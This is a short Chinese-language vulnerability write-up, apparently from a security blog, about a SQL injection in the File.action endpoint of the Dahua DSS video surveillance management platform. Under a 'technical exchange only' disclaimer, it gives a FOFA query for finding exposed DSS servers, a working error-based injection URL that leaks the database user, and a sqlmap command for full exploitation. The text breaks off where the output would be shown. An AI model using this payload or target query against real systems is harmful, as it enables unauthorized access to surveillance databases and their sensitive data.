声明:
本文仅用于技术交流,请勿用于非法用途
由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。
简介
大华DSS是大华的大型监控管理应用平台,支持几乎所有涉及监控等方面的操作,支持多级跨平台联网等操作。将视频监控、卡口拍照、 区间测速 、电子地图、违章查询系统等诸多主流应用整合,实现更加智能、便捷的分级查询服务。
大华 DSS 数字监控系统 存在File.action SQL注入,黑客可以利用该漏洞执行任意SQL语句,获取敏感信息,造成危害。
资产搜索
fofa:
app="dahua-DSS"
漏洞复现
漏洞验证:
http://127.0.0.1/portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(11,CONCAT(0x7e,user(),0x7e))%20AND%20(%27ccC%27=%27ccC&bean.TabName=1
漏洞利用:
python3 sqlmap.py -u http://127.0.0.1/portal/attachment_clearTempFile.action?bean.RecId=1
输入不同参数,输出内容(以下为数据库)